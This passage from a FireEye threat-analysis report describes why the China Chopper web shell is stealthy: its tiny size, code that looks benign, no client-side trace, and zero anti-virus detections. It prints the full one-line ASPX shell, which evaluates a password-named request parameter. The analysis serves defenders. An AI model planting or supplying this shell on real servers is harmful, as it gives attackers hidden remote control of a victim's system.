Payload Attributes
China Chopper is stealthy due to a number of factors, including the following:


Size


Server-side content


Client-side content


AV detection rate (or lack thereof)


Size
Malicious and benign software usually suffers from the same principle: more features equals more code,
which equals larger size. Considering how many features China Chopper offers, it is incredibly small—just
73 bytes for the ASPX version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells
such as Laudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and
simple that an attacker could conceivably type the contents of the shell by hand.
Figure 14: China Chopper
file properties
FireEye, Inc. The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell 11
Server-Side Content
The server-side content could easily be overlooked among the other files associated with a vanilla
install of a complex application. The code does not look malicious—just odd.
Figure 15: The content of the file
seems relatively benign, especially
if with a safe-sounding word like
“Security” as the shell password
Below are the contents of the Web shell for two of its varieties.
ASPX:
<%@ Page Language=”Jscript”%><%eval(RequestItem[“password”],”unsafe”);%>
PHP:

Client-Side Content
Because all of the code is server-side language that does not generate client-side code,
browsing to the Web shell and viewing the source as a client reveals nothing.
Figure 16: Viewing the source of the
Web shell reveals nothing to the client
FireEye, Inc. The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell 12
Anti-Virus Detection Rate
Running the Web shell through the virus-scanning website “No Virus Thanks” shows a detection rate of
0 out of 14, indicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.
Figure 17: Results of multiple anti-virus
engine inspections showing China
Chopper coming up clean
FireEye, Inc. The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell 13
The same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.
Figure 18: Results of multiple AV
engine inspections showing the
Web shell comes up clean